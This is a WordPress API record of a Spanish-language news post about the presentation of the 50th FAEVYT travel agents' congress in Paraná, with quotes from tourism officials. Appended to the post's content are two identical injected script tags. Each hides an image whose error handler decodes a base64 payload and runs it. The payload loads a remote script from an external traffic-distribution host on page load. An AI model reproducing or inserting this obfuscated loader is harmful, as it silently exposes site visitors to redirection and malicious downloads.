{"id":5104,"date":"2025-04-30T08:21:44","date_gmt":"2025-04-30T11:21:44","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5104"},"modified":"2025-08-13T23:34:59","modified_gmt":"2025-08-14T02:34:59","slug":"scioli-en-la-presentacion-del-50-congreso-de-agentes-de-viajes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5104","title":{"rendered":"Scioli en la presentaci\u00f3n del 50\u00b0 Congreso de Agentes de Viajes"},"content":{"rendered":"\n<p><strong><em>La ciudad entrerriana de Paran\u00e1 ser\u00e1 la sede de esta edici\u00f3n, convocada para el 22 de mayo por la FAEVYT en coordinaci\u00f3n con la Asamblea del CFT.<\/em><\/strong><\/p>\n\n\n\n<p>La\u00a0<strong>50\u00aa edici\u00f3n del Congreso de Agentes de Viajes FAEVYT<\/strong>\u00a0-que tendr\u00e1 lugar en\u00a0<strong>Paran\u00e1<\/strong>\u00a0el 22 y el 23 de mayo, en coordinaci\u00f3n con la\u00a0<strong>171\u00aa Asamblea del Consejo Federal de Turismo (CFT)<\/strong>&#8211; fue presentada en la\u00a0<strong>Casa de Entre R\u00edos<\/strong>\u00a0en Buenos Aires, en un acto del que participaron el secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0<strong>Daniel Scioli<\/strong>, y el presidente de la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo (FAEVYT),\u00a0<strong>Andr\u00e9s Dey\u00e1<\/strong>.<\/p>\n\n\n\n<p>En este contexto,\u00a0<strong>Scioli<\/strong>\u00a0expres\u00f3 su agradecimiento al gobernador\u00a0<strong>Rogelio Frigerio<\/strong>\u00a0<em>\u201cpor haber puesto al turismo en un lugar muy especial de su agenda de gobierno\u201d<\/em>\u00a0y subray\u00f3 que\u00a0<em>\u201cEntre R\u00edos no se queda esperando que los turistas vayan, sino que sale permanentemente a poner en valor su diversidad, su oferta, el contacto con la naturaleza, sus r\u00edos, la cultura\u201d<\/em>.<\/p>\n\n\n\n<p><em>\u201cCelebro la convocatoria a este espacio de crecimiento, de actualizaci\u00f3n y de inspiraci\u00f3n que el Congreso brinda, un \u00e1mbito propicio para abordar los desaf\u00edos que el turismo nos plantea cada d\u00eda con un temario que parece del futuro, pero ya es el presente\u201d<\/em>, puntualiz\u00f3.<\/p>\n\n\n\n<p>En tanto,&nbsp;<strong>Dey\u00e1<\/strong>&nbsp;detall\u00f3 que,&nbsp;<em>\u201ccon esta edici\u00f3n, el Congreso lleva recorridas diecisiete provincias que fueron sede, un dato que marca el federalismo y la igualdad de condiciones\u201d<\/em>.<\/p>\n\n\n\n<p><em>\u201cLos agentes de viajes sienten que hay que capacitarse, participar y sacarse dudas, por eso el programa responde a esas necesidades. Vamos a poner en valor el rol de los agentes de viajes como protagonistas clave en la cadena tur\u00edstica, trabajando en conjunto con Entre R\u00edos y Santa Fe para que esta edici\u00f3n sea inolvidable\u201d<\/em>, apunt\u00f3.<\/p>\n\n\n\n<p>De la presentaci\u00f3n tambi\u00e9n participaron el secretario de Turismo de Entre R\u00edos,&nbsp;<strong>Jorge Satto<\/strong>, y el vicepresidente de la Regi\u00f3n Litoral de FAEVYT,&nbsp;<strong>Fabricio Meglio<\/strong>.<\/p>\n\n\n\n<p><strong>Satto<\/strong>&nbsp;dijo que este Congreso es&nbsp;<em>\u201cun desaf\u00edo muy interesante para nuestra provincia, que quiere estar en los primeros planos del turismo nacional, internacional y regional\u201d y consider\u00f3 que los anfitriones van a mostrar que son \u201ccapaces de mantener un evento de esta magnitud\u201d<\/em>.<\/p>\n\n\n\n<p>La agenda del Congreso incluye temas tales como nuevas tecnolog\u00edas, Inteligencia Artificial, desarrollo del talento humano, tendencias en turismo y cultura. Adem\u00e1s, habr\u00e1 talleres y espacios de networking pensados para potenciar el rol estrat\u00e9gico de los agentes de viajes.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:317px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La ciudad entrerriana de Paran\u00e1 ser\u00e1 la sede de esta edici\u00f3n, convocada para el 22 de mayo por la FAEVYT en coordinaci\u00f3n con la Asamblea del CFT. La\u00a050\u00aa edici\u00f3n del Congreso de Agentes de Viajes FAEVYT\u00a0-que tendr\u00e1 lugar en\u00a0Paran\u00e1\u00a0el 22 y el 23 de mayo, en coordinaci\u00f3n con la\u00a0171\u00aa Asamblea del Consejo Federal de Turismo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5105,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-5104","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5104"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5104"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5104\/revisions"}],"predecessor-version":[{"id":6507,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5104\/revisions\/6507"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5105"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5104"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5104"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5104"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}